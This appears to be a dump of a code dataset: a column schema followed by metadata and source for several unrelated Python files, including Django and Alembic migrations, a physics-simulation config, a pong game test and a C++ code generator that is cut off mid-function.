repo_name
stringlengths 7
111
| __id__
int64 16.6k
19,705B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
151
| content_id
stringlengths 40
40
| detected_licenses
sequence | license_type
stringclasses 2
values | repo_url
stringlengths 26
130
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
42
| visit_date
unknown | revision_date
unknown | committer_date
unknown | github_id
int64 14.6k
687M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 12
values | gha_fork
bool 2
classes | gha_event_created_at
unknown | gha_created_at
unknown | gha_updated_at
unknown | gha_pushed_at
unknown | gha_size
int64 0
10.2M
⌀ | gha_stargazers_count
int32 0
178k
⌀ | gha_forks_count
int32 0
88.9k
⌀ | gha_open_issues_count
int32 0
2.72k
⌀ | gha_language
stringlengths 1
16
⌀ | gha_archived
bool 1
class | gha_disabled
bool 1
class | content
stringlengths 10
2.95M
| src_encoding
stringclasses 5
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 10
2.95M
| extension
stringclasses 19
values | num_repo_files
int64 1
202k
| filename
stringlengths 4
112
| num_lang_files
int64 1
202k
| alphanum_fraction
float64 0.26
0.89
| alpha_fraction
float64 0.2
0.89
| hex_fraction
float64 0
0.09
| num_lines
int32 1
93.6k
| avg_line_length
float64 4.57
103
| max_line_length
int64 7
931
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
SyuziH/HTI-3-Group-2-Syuzi-Harutyunyan | 18,794,776,907,639 | a39282edd778a2bd2cb2d7576bae217257f9b47f | 8a55474e5a4297ef2e43e887eb1fa601855bd06c | /Homework 3/is_prime.py | 4a2a7bf99860b74b3b56e9c207beb59f35245677 | [] | no_license | https://github.com/SyuziH/HTI-3-Group-2-Syuzi-Harutyunyan | ae91410f61b5c177e6b9f6f1842060cf6e0853b8 | dad4b9dafc77d41e0fba14ed3e87f17b5fc549d4 | refs/heads/master | "2023-04-02T03:17:04.174947" | "2021-04-07T23:36:21" | "2021-04-07T23:36:21" | 328,346,617 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def is_prime(num):
if num > 1:
for i in range(2, num):
if (num % i == 0):
print('No')
break
else:
print('Yes')
else:
print('Is not a prime number')
number = int(input('Enter the number '))
is_prime(number)
| UTF-8 | Python | false | false | 297 | py | 23 | is_prime.py | 21 | 0.444444 | 0.434343 | 0 | 15 | 18.8 | 40 |
masary2989/EC_site_webapp | 19,413,252,203,169 | f9c23434d0ebd66f4d69c1ba289027480d2faa55 | 23541da0aae0f5040cb47b1a55c604c05d4418cd | /eth_ec_server/ec_site/migrations/0001_initial.py | 1b879e3b5920e4d88e52bb669dc94a4d667dffca | [] | no_license | https://github.com/masary2989/EC_site_webapp | 17f30aafcb9d7747af60d324f4c7e61f5e251ba7 | a9f1c7bb36eb6855bcfdec78d484c368d89e9c2a | refs/heads/master | "2021-09-21T12:21:11.755539" | "2019-03-28T05:05:28" | "2019-03-28T05:05:28" | 162,418,975 | 0 | 0 | null | false | "2022-01-13T01:04:52" | "2018-12-19T10:06:11" | "2019-03-28T05:05:31" | "2022-01-13T01:04:49" | 129,569 | 0 | 0 | 30 | Visual Basic | false | false | # Generated by Django 2.1.4 on 2018-12-18 05:27
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Address',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('address', models.CharField(max_length=100)),
('message', models.CharField(max_length=300)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('contract_tx', models.BigIntegerField()),
('message', models.CharField(max_length=300)),
('payment', models.PositiveSmallIntegerField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('message', models.CharField(max_length=300)),
('image', models.ImageField(upload_to='ec_site/uploads/%Y/%m/%d/')),
('price', models.PositiveSmallIntegerField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('email', models.EmailField(max_length=254)),
('message', models.CharField(max_length=300)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now_add=True)),
],
),
migrations.AddField(
model_name='order',
name='pid',
field=models.ManyToManyField(to='ec_site.Product'),
),
migrations.AddField(
model_name='order',
name='uid',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ec_site.User'),
),
migrations.AddField(
model_name='address',
name='uid',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ec_site.User'),
),
]
| UTF-8 | Python | false | false | 3,030 | py | 34 | 0001_initial.py | 20 | 0.545215 | 0.532343 | 0 | 74 | 39.945946 | 114 |
Jazminnava/Mundo-de-productos | 4,398,046,532,952 | ec39a993722a60393fbc6c3739eddbb0abfbb643 | c62e1758762440c94098271d77c03482895a25d1 | /migrations/versions/ef581bcb9460_inital_mirtaions.py | 82ca82bb36af2a4da0af20e66f3ec5708694a2fc | [] | no_license | https://github.com/Jazminnava/Mundo-de-productos | 548e61d9a21e67388f9bbe1509c2b0ca94ef9ee4 | 8748587d62a4cbafd01e20f4e7a1a63b95fb2e9e | refs/heads/master | "2022-12-18T19:15:44.141215" | "2020-09-12T19:47:18" | "2020-09-12T19:47:18" | 295,008,059 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """inital mirtaions
Revision ID: ef581bcb9460
Revises:
Create Date: 2020-08-05 01:02:02.400739
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'ef581bcb9460'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('administrador',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('apellidop', sa.String(length=80), nullable=False),
sa.Column('apellidom', sa.String(length=80), nullable=False),
sa.Column('edad', sa.String(length=80), nullable=False),
sa.Column('telefono', sa.String(length=80), nullable=False),
sa.Column('calle', sa.String(length=80), nullable=False),
sa.Column('colonia', sa.String(length=80), nullable=False),
sa.Column('numdire', sa.String(length=70), nullable=False),
sa.Column('image_1', sa.String(length=150), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('brand',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=40), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('category',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=40), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('cliente',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('apellidop', sa.String(length=80), nullable=False),
sa.Column('apellidom', sa.String(length=80), nullable=False),
sa.Column('edad', sa.String(length=80), nullable=False),
sa.Column('telefono', sa.String(length=80), nullable=False),
sa.Column('calle', sa.String(length=80), nullable=False),
sa.Column('colonia', sa.String(length=80), nullable=False),
sa.Column('numdire', sa.String(length=70), nullable=False),
sa.Column('image_1', sa.String(length=150), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('dueño',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('apellidop', sa.String(length=80), nullable=False),
sa.Column('apellidom', sa.String(length=80), nullable=False),
sa.Column('edad', sa.String(length=80), nullable=False),
sa.Column('telefono', sa.String(length=80), nullable=False),
sa.Column('calle', sa.String(length=80), nullable=False),
sa.Column('colonia', sa.String(length=80), nullable=False),
sa.Column('numdire', sa.String(length=70), nullable=False),
sa.Column('image_1', sa.String(length=150), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('register',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=True),
sa.Column('f_name', sa.String(length=50), nullable=True),
sa.Column('username', sa.String(length=50), nullable=True),
sa.Column('email', sa.String(length=50), nullable=True),
sa.Column('password', sa.String(length=200), nullable=True),
sa.Column('state', sa.String(length=50), nullable=True),
sa.Column('city', sa.String(length=50), nullable=True),
sa.Column('contact', sa.String(length=50), nullable=True),
sa.Column('address', sa.String(length=50), nullable=True),
sa.Column('zipcode', sa.String(length=50), nullable=True),
sa.Column('profile', sa.String(length=200), nullable=True),
sa.Column('date_created', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email'),
sa.UniqueConstraint('username')
)
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=30), nullable=False),
sa.Column('username', sa.String(length=80), nullable=False),
sa.Column('email', sa.String(length=120), nullable=False),
sa.Column('password', sa.String(length=180), nullable=False),
sa.Column('profile', sa.String(length=180), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email'),
sa.UniqueConstraint('username')
)
op.create_table('vendedor',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('apellidop', sa.String(length=80), nullable=False),
sa.Column('apellidom', sa.String(length=80), nullable=False),
sa.Column('edad', sa.String(length=80), nullable=False),
sa.Column('telefono', sa.String(length=80), nullable=False),
sa.Column('calle', sa.String(length=80), nullable=False),
sa.Column('colonia', sa.String(length=80), nullable=False),
sa.Column('numdire', sa.String(length=70), nullable=False),
sa.Column('image_1', sa.String(length=150), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('addproduct',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('price', sa.Numeric(precision=10, scale=2), nullable=False),
sa.Column('discount', sa.Integer(), nullable=False),
sa.Column('stock', sa.Integer(), nullable=False),
sa.Column('colors', sa.Text(), nullable=False),
sa.Column('desc', sa.Text(), nullable=False),
sa.Column('pub_date', sa.DateTime(), nullable=False),
sa.Column('brand_id', sa.Integer(), nullable=False),
sa.Column('category_id', sa.Integer(), nullable=False),
sa.Column('image_1', sa.String(length=150), nullable=False),
sa.Column('image_2', sa.String(length=150), nullable=False),
sa.Column('image_3', sa.String(length=150), nullable=False),
sa.ForeignKeyConstraint(['brand_id'], ['brand.id'], ),
sa.ForeignKeyConstraint(['category_id'], ['category.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('venta',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('precio', sa.String(length=80), nullable=False),
sa.Column('total', sa.String(length=80), nullable=False),
sa.Column('cliente_id', sa.Integer(), nullable=False),
sa.Column('vendedor_id', sa.Integer(), nullable=False),
sa.Column('addproduct_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['addproduct_id'], ['addproduct.id'], ),
sa.ForeignKeyConstraint(['cliente_id'], ['cliente.id'], ),
sa.ForeignKeyConstraint(['vendedor_id'], ['vendedor.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('venta')
op.drop_table('addproduct')
op.drop_table('vendedor')
op.drop_table('user')
op.drop_table('register')
op.drop_table('dueño')
op.drop_table('cliente')
op.drop_table('category')
op.drop_table('brand')
op.drop_table('administrador')
# ### end Alembic commands ###
| UTF-8 | Python | false | false | 7,135 | py | 21 | ef581bcb9460_inital_mirtaions.py | 8 | 0.666059 | 0.641105 | 0 | 160 | 43.58125 | 74 |
amkalsi/cmssw | 2,448,131,381,593 | 5d9bb25a263db52197a1f1b04574bc5af57da158 | 006ff11fd8cfd5406c6f4318f1bafa1542095f2a | /SLHCUpgradeSimulations/Geometry/python/fakeConditions_Phase1_cff.py | 105dcbf9971250dc22709c419f43bebd6ea7d0f6 | [] | permissive | https://github.com/amkalsi/cmssw | 8ac5f481c7d7263741b5015381473811c59ac3b1 | ad0f69098dfbe449ca0570fbcf6fcebd6acc1154 | refs/heads/CMSSW_7_4_X | "2021-01-19T16:18:22.857382" | "2016-08-09T16:40:50" | "2016-08-09T16:40:50" | 262,608,661 | 0 | 0 | Apache-2.0 | true | "2020-05-09T16:10:07" | "2020-05-09T16:10:07" | "2020-05-08T19:57:19" | "2020-05-09T14:58:01" | 1,118,070 | 0 | 0 | 0 | null | false | false | import FWCore.ParameterSet.Config as cms
siPixelFakeGainOfflineESSource = cms.ESSource("SiPixelFakeGainOfflineESSource",
file = cms.FileInPath('SLHCUpgradeSimulations/Geometry/data/PhaseI/EmptyPixelSkimmedGeometry_phase1.txt')
)
es_prefer_fake_gain = cms.ESPrefer("SiPixelFakeGainOfflineESSource","siPixelFakeGainOfflineESSource")
from CalibTracker.SiStripESProducers.fake.SiStripNoisesFakeESSource_cfi import *
SiStripNoisesGenerator.NoiseStripLengthSlope=cms.vdouble(51.) #dec mode
SiStripNoisesGenerator.NoiseStripLengthQuote=cms.vdouble(630.)
siStripNoisesFakeESSource = cms.ESSource("SiStripNoisesFakeESSource")
es_prefer_fake_strip_noise = cms.ESPrefer("SiStripNoisesFakeESSource",
"siStripNoisesFakeESSource")
from CalibTracker.SiStripESProducers.fake.SiStripQualityFakeESSource_cfi import *
siStripQualityFakeESSource = cms.ESSource("SiStripQualityFakeESSource")
es_prefer_fake_strip_quality = cms.ESPrefer("SiStripQualityFakeESSource",
"siStripQualityFakeESSource")
from CalibTracker.SiStripESProducers.fake.SiStripPedestalsFakeESSource_cfi import *
siStripPedestalsFakeESSource = cms.ESSource("SiStripPedestalsFakeESSource")
es_prefer_fake_strip_pedestal = cms.ESPrefer("SiStripPedestalsFakeESSource",
"siStripPedestalsFakeESSource")
from CalibTracker.SiStripESProducers.fake.SiStripLorentzAngleFakeESSource_cfi import *
siStripLorentzAngleFakeESSource = cms.ESSource("SiStripLorentzAngleFakeESSource")
es_prefer_fake_strip_LA = cms.ESPrefer("SiStripLorentzAngleFakeESSource",
"siStripLorentzAngleFakeESSource")
siStripLorentzAngleSimFakeESSource = cms.ESSource("SiStripLorentzAngleSimFakeESSource")
es_prefer_fake_strip_LA_sim = cms.ESPrefer("SiStripLorentzAngleSimFakeESSource",
"siStripLorentzAngleSimFakeESSource")
from CalibTracker.SiStripESProducers.fake.SiStripApvGainFakeESSource_cfi import *
SiStripApvGainGenerator.MeanGain=cms.double(1.0)
SiStripApvGainGenerator.SigmaGain=cms.double(0.0)
SiStripApvGainGenerator.genMode = cms.string("default")
myStripApvGainFakeESSource = cms.ESSource("SiStripApvGainFakeESSource")
es_prefer_myStripApvGainFakeESSource = cms.ESPrefer("SiStripApvGainFakeESSource",
"myStripApvGainFakeESSource")
myStripApvGainSimFakeESSource = cms.ESSource("SiStripApvGainSimFakeESSource")
es_prefer_myStripApvGainSimFakeESSource = cms.ESPrefer("SiStripApvGainSimFakeESSource",
"myStripApvGainSimFakeESSource")
from CalibTracker.SiStripESProducers.fake.SiStripThresholdFakeESSource_cfi import *
siStripThresholdFakeESSource = cms.ESSource("SiStripThresholdFakeESSource")
es_prefer_fake_strip_threshold = cms.ESPrefer("SiStripThresholdFakeESSource",
"siStripThresholdFakeESSource")
# from Geometry.TrackerGeometryBuilder.trackerGeometry_cfi import * Double check this later
# TrackerDigiGeometryESModule.applyAlignment = False
from RecoTracker.MeasurementDet.MeasurementTrackerESProducer_cfi import *
MeasurementTracker.inactiveStripDetectorLabels = cms.VInputTag()
MeasurementTracker.UseStripModuleQualityDB = cms.bool(False)
MeasurementTracker.UseStripAPVFiberQualityDB = cms.bool(False)
from RecoVertex.BeamSpotProducer.BeamSpotFakeParameters_cfi import *
BeamSpotFakeConditions.X0 = cms.double(0.0)
BeamSpotFakeConditions.Y0 = cms.double(0.0)
BeamSpotFakeConditions.Z0 = cms.double(0.0)
BeamSpotFakeConditions.dxdz = cms.double(0.0)
BeamSpotFakeConditions.dydz = cms.double(0.0)
BeamSpotFakeConditions.sigmaZ = cms.double(5.3)
BeamSpotFakeConditions.widthX = cms.double(0.0015)
BeamSpotFakeConditions.widthY = cms.double(0.0015)
BeamSpotFakeConditions.emittanceX = cms.double(0.)
BeamSpotFakeConditions.emittanceY = cms.double(0.)
BeamSpotFakeConditions.betaStar = cms.double(0.)
BeamSpotFakeConditions.errorX0 = cms.double(0.00002)
BeamSpotFakeConditions.errorY0 = cms.double(0.00002)
BeamSpotFakeConditions.errorZ0 = cms.double(0.04000)
BeamSpotFakeConditions.errordxdz = cms.double(0.0)
BeamSpotFakeConditions.errordydz = cms.double(0.0)
BeamSpotFakeConditions.errorSigmaZ = cms.double(0.03000)
BeamSpotFakeConditions.errorWidth = cms.double(0.00003)
es_prefer_beamspot = cms.ESPrefer("BeamSpotFakeConditions","")
from SimGeneral.TrackingAnalysis.trackingParticles_cfi import *
mergedtruth.volumeRadius = cms.double(100.0)
mergedtruth.volumeZ = cms.double(900.0)
mergedtruth.discardOutVolume = cms.bool(True)
#from Geometry.TrackerNumberingBuilder.pixelSLHCGeometryConstants_cfi import *
from Geometry.TrackerGeometryBuilder.idealForDigiTrackerSLHCGeometry_cff import *
| UTF-8 | Python | false | false | 4,881 | py | 2,051 | fakeConditions_Phase1_cff.py | 1,842 | 0.774227 | 0.757222 | 0 | 89 | 53.842697 | 113 |
dkeefe3773/pong-rl | 15,582,141,366,338 | e3844b275290147c174b2ea4bc88e34c90d23451 | 541222c60bd307affe8bf54a1427f148f2e8d3a1 | /apps/game_render_test.py | 9e053c6b237b8414099c39ceb80546bde09da625 | [
"MIT"
] | permissive | https://github.com/dkeefe3773/pong-rl | e9b06bc1412b489ecb42d0ed2e3e5d612348f8cd | e0d548267d7e0ca1b8690224cfd827af8ff571ab | refs/heads/master | "2020-12-04T15:53:35.572060" | "2020-07-05T05:26:30" | "2020-07-05T05:26:30" | 231,824,795 | 0 | 0 | MIT | false | "2020-09-06T04:10:28" | "2020-01-04T20:35:37" | "2020-07-05T05:27:21" | "2020-09-06T04:08:31" | 146 | 0 | 0 | 1 | Python | false | false | import time
from gamerender.pongrenders import DefaultPongRenderer
from injections import providers
from proto_gen.gamemaster_pb2 import PlayerIdentifier, PaddleType
def test_game_render():
player_left_identifier = PlayerIdentifier(player_name="LEFT_PLAYER",
paddle_strategy_name="LEFT_STRATEGY",
paddle_type=PaddleType.LEFT)
player_right_identifier = PlayerIdentifier(player_name="RIGHT_PLAYER",
paddle_strategy_name="RIGHT_STRATEGY",
paddle_type=PaddleType.RIGHT)
pong_renderer: DefaultPongRenderer = providers.GameRendererProviders.pong_renderer()
pong_renderer.register_player(player_left_identifier)
time.sleep(1)
pong_renderer.register_player(player_right_identifier)
time.sleep(1)
pong_renderer.start_game()
if __name__ == "__main__":
test_game_render()
| UTF-8 | Python | false | false | 995 | py | 43 | game_render_test.py | 38 | 0.621106 | 0.61809 | 0 | 31 | 31.096774 | 88 |
asmirnov69/pybx | 17,016,660,443,549 | 0f190925d30a1873d02f85c299e96f2797ac76d9 | 732a541fd311256d1468e2ad50d8d11e27fe0a15 | /src/libpybx-py/codegen_cpp.py | 4cd01e20232ee5e6c3cb0e02aff98cfa7c5b502f | [] | no_license | https://github.com/asmirnov69/pybx | 1ff929824f059a95dbd7ca4a2fe3a59fd8eeed39 | e98db07297b26f0d477ef4f28894573f08c967a6 | refs/heads/master | "2023-02-20T17:58:13.844574" | "2021-01-14T03:56:11" | "2021-01-14T03:56:11" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import ipdb
import os.path
def generate_prolog(source_pybx_fn, out_fd):
macro_lock_s = os.path.basename(source_pybx_fn).split(".")[0].upper()
prolog_code = f"""// -*- c++ -*-
// generated code: source - {source_pybx_fn}
#ifndef __{macro_lock_s}_STUBS_HH__
#define __{macro_lock_s}_STUBS_HH__
#define TOKENPASTE(x, y) x ## y
#define TOKENPASTE2(x, y) TOKENPASTE(x, y)
#define UNIQUE static int TOKENPASTE2(Unique_, __LINE__)
#include <memory>
#include <string>
#include <stdexcept>
using namespace std;
#include <kvan/json-io.h>
#include <libpybx-cpp/communicator.h>
#include <libpybx-cpp/proto.h>
#include <libpybx-cpp/remote-methods.h>
"""
print(prolog_code, file = out_fd)
def generate_epilog(out_fd):
print("#endif", file = out_fd)
def get_cpp_namespace(identifier):
return "pybx::" + identifier
def generate_struct_def(struct_def, out_fd):
# struct def
#ipdb.set_trace()
cpp_namespace = get_cpp_namespace(struct_def.def_type.__module__)
print(f"namespace {cpp_namespace} {{", file = out_fd)
print(f"struct {struct_def.name} {{", file = out_fd)
for m_def in struct_def.fields:
#ipdb.set_trace()
m_cpp_name = m_def.get_member_name()
m_cpp_type = m_def.get_member_type().get_cpp_code_name()
print(f" {m_cpp_type} {m_cpp_name};", file = out_fd);
print("};\n}", file = out_fd)
#get_struct_descriptor
print(f"template <> inline StructDescriptor get_struct_descriptor<{cpp_namespace}::{struct_def.name}>()", file = out_fd)
print("{", file = out_fd)
print(" static const StructDescriptor sd = {", file = out_fd)
for m_def in struct_def.fields:
m_cpp_name = m_def.get_member_name()
print(f" make_member_descriptor(\"{m_cpp_name}\", &{cpp_namespace}::{struct_def.name}::{m_cpp_name}),", file = out_fd)
print(" };", file = out_fd)
print(" return sd;", file = out_fd)
print("}", file = out_fd)
def generate_enum_def(enum_def, out_fd):
#enum def
#ipdb.set_trace()
cpp_namespace = get_cpp_namespace(enum_def.def_type.__module__)
print(f"namespace {cpp_namespace} {{", file = out_fd)
print(f"enum class {enum_def.name} {{", file = out_fd);
for m_name, m_value in zip(enum_def.members, enum_def.member_values):
print(f"{m_name} = {m_value},", file = out_fd)
print("};", file = out_fd)
print(f"}}", file = out_fd)
# get_enum_value_string
print(f"template <> inline std::string get_enum_value_string<{cpp_namespace}::{enum_def.name}>({cpp_namespace}::{enum_def.name} v) {{", file = out_fd)
print(" std::string ret;", file = out_fd)
print(" switch (v) {", file = out_fd)
for m_name, m_value in zip(enum_def.members, enum_def.member_values):
print(f" case {cpp_namespace}::{enum_def.name}::{m_name}: ret = \"{m_name}\"; break;", file = out_fd)
print(" }", file = out_fd)
print(" return ret;", file = out_fd)
print("}", file = out_fd)
# set_enum_value
print(f"template <> inline void set_enum_value<{cpp_namespace}::{enum_def.name}>({cpp_namespace}::{enum_def.name}* v, const std::string& new_v)", file = out_fd)
print("{", file = out_fd)
m_name = enum_def.members[0]
print(f" if (new_v == \"{m_name}\") *v = {cpp_namespace}::{enum_def.name}::{m_name};", file = out_fd)
for m_name in enum_def.members[1:]:
print(f" else if (new_v == \"{m_name}\") *v = {cpp_namespace}::{enum_def.name}::{m_name};", file = out_fd)
print(" else {", file = out_fd)
print(" std::ostringstream m;", file = out_fd)
print(f" m << \"set_enum_value for {enum_def.name}: unknown string \" << new_v;", file = out_fd)
print(" throw runtime_error(m.str());", file = out_fd)
print(" }", file = out_fd)
print("}", file = out_fd)
def generate_interface_client_forward_declarations(module_def, out_fd):
cpp_namespace = get_cpp_namespace(module_def.name)
print(f"namespace {cpp_namespace} {{", file = out_fd)
for interface_def in module_def.interfaces:
print(f"class {interface_def.name}_rop;", file = out_fd)
print("}", file = out_fd)
def generate_interface_client_declarations(interface_def, out_fd):
cpp_namespace = get_cpp_namespace(interface_def.def_type.__module__)
class_name = interface_def.name + "_rop"
print(f"namespace {cpp_namespace} {{", file = out_fd)
print(f"class {class_name} {{", file = out_fd)
print("private:", file = out_fd)
print(" ::pybx::Communicator* comm{nullptr};", file = out_fd)
print(" std::shared_ptr<ix::WebSocket> ws;", file = out_fd)
print("public:", file = out_fd)
print(" bool oneway{false};", file = out_fd)
print(" std::string object_id;", file = out_fd)
print(f" std::string __interface_type{{\"{cpp_namespace}.{interface_def.name}\"}};", file = out_fd)
print(f" {class_name}();", file = out_fd)
print(f" {class_name}(::pybx::Communicator* comm, std::shared_ptr<ix::WebSocket> ws, const std::string& ws_url, const std::string& object_id);", file = out_fd)
print(f" {class_name}(::pybx::Communicator* comm, const std::string& object_id);", file = out_fd)
print(f" void activate(::pybx::Communicator* comm, std::shared_ptr<ix::WebSocket> ws);", file = out_fd)
for m_def in interface_def.methods:
m_cpp_ret_type = m_def.get_method_return_type().get_cpp_code_name()
m_args_l = []
for t, n in zip(m_def.get_method_arg_types(), m_def.get_method_args()):
m_args_l.append(t.get_cpp_code_name() + " " + n)
m_args = ", ".join(m_args_l)
print(f" {m_cpp_ret_type} {m_def.name}({m_args});", file = out_fd)
print(f"}};", file = out_fd)
print(f"}}", file = out_fd)
# get_struct_descriptor for rop class
print(f"template <> inline StructDescriptor get_struct_descriptor<{cpp_namespace}::{class_name}>()", file = out_fd)
print("{", file = out_fd)
print(" static const StructDescriptor sd = {", file = out_fd)
print(f" make_member_descriptor(\"object_id\", &{cpp_namespace}::{class_name}::object_id),", file = out_fd)
print(f" make_member_descriptor(\"__interface_type\", &{cpp_namespace}::{class_name}::__interface_type),", file = out_fd)
print(" };", file = out_fd)
print(" return sd;", file = out_fd)
print("}", file = out_fd)
def generate_interface_server_declarations(interface_def, out_fd):
cpp_namespace = get_cpp_namespace(interface_def.def_type.__module__)
print(f"namespace {cpp_namespace} {{", file = out_fd)
print(f"class {interface_def.name} : public ::pybx::Object {{", file = out_fd)
print("public:", file = out_fd)
print(f" typedef {interface_def.name}_rop rop_t;", file = out_fd)
#ipdb.set_trace()
for m_def in interface_def.methods:
m_cpp_ret_type = m_def.get_method_return_type().get_cpp_code_name()
m_args_l = []
for t, n in zip(m_def.get_method_arg_types(), m_def.get_method_args()):
m_args_l.append(t.get_cpp_code_name() + " " + n)
m_args = ", ".join(m_args_l)
print(f" virtual {m_cpp_ret_type} {m_def.name}({m_args}) = 0;", file = out_fd)
print(f"}};", file = out_fd)
print(f"}}", file = out_fd)
# method implementations
for m_def in interface_def.methods:
method_impl_class_name = f"{interface_def.name}__{m_def.name}"
# method impl class
print(f"namespace {cpp_namespace} {{", file = out_fd)
print(f"struct {method_impl_class_name} : public ::pybx::method_impl", file = out_fd)
print("{", file = out_fd)
print(" struct args_t {", file = out_fd)
m_args_l = []
for t, n in zip(m_def.get_method_arg_types(), m_def.get_method_args()):
tt = t.get_cpp_code_name()
m_args_l.append(f"{tt} {n};")
m_args = "\n".join(m_args_l)
print(f" {m_args}", file = out_fd)
print(" };", file = out_fd)
print(" struct return_t {", file = out_fd)
m_cpp_ret_type = m_def.get_method_return_type().get_cpp_code_name()
m_cpp_ret_type = m_cpp_ret_type if m_cpp_ret_type != "void" else "json_null_t"
print(f" {m_cpp_ret_type} retval;", file = out_fd)
print(" };", file = out_fd)
print(" void do_call(const std::string& req_s, std::string* res_s, std::shared_ptr<ix::WebSocket>) override;", file = out_fd)
print("};", file = out_fd)
print(f"}}", file = out_fd)
# get_struct_descriptor for args_t, return_t, Request<args_t>, Response<return_t>
print(f"template <> inline StructDescriptor get_struct_descriptor<{cpp_namespace}::{method_impl_class_name}::args_t>()", file = out_fd)
print("{", file = out_fd)
print(" static const StructDescriptor sd = {", file = out_fd)
for m_arg in m_def.get_method_args():
print(f" make_member_descriptor(\"{m_arg}\", &{cpp_namespace}::{method_impl_class_name}::args_t::{m_arg}),", file = out_fd)
print(" };", file = out_fd)
print(" return sd;", file = out_fd)
print("}", file = out_fd)
print(f"template <> inline StructDescriptor get_struct_descriptor<::pybx::Request<{cpp_namespace}::{method_impl_class_name}::args_t>>()", file = out_fd)
print("{", file = out_fd)
print(f" return get_StructDescriptor_T<{cpp_namespace}::{method_impl_class_name}::args_t, ::pybx::Request>::get_struct_descriptor();", file = out_fd)
print("}", file = out_fd)
print(f"template <> inline StructDescriptor get_struct_descriptor<{cpp_namespace}::{method_impl_class_name}::return_t>()", file = out_fd)
print("{", file = out_fd)
print(" static const StructDescriptor sd = {", file = out_fd)
print(f" make_member_descriptor(\"retval\", &{cpp_namespace}::{method_impl_class_name}::return_t::retval),", file = out_fd)
print(" };", file = out_fd)
print(" return sd;", file = out_fd)
print("}", file = out_fd)
print(f"template <> inline StructDescriptor get_struct_descriptor<::pybx::Response<{cpp_namespace}::{method_impl_class_name}::return_t>>()", file = out_fd)
print("{", file = out_fd)
print(f" return get_StructDescriptor_T<{cpp_namespace}::{method_impl_class_name}::return_t, ::pybx::Response>::get_struct_descriptor();", file = out_fd)
print("}", file = out_fd)
def generate_interface_client_definitions(interface_def, out_fd):
cpp_namespace = get_cpp_namespace(interface_def.def_type.__module__)
class_name = f"{interface_def.name}_rop"
print(f"namespace {cpp_namespace} {{", file = out_fd)
print(f"inline {class_name}::{class_name}()", file = out_fd)
print("{", file = out_fd)
print("}", file = out_fd)
print(f"inline {class_name}::{class_name}(::pybx::Communicator* comm,", file = out_fd)
print("std::shared_ptr<ix::WebSocket> ws,", file = out_fd)
print("const std::string& ws_url, const std::string& object_id)", file = out_fd)
print("{", file = out_fd)
print(" this->comm = comm;", file = out_fd)
print(" this->ws = ws;", file = out_fd)
print(" this->object_id = object_id;", file = out_fd)
print("}", file = out_fd)
print(f"inline {class_name}::{class_name}(::pybx::Communicator* comm, const std::string& object_id)", file = out_fd)
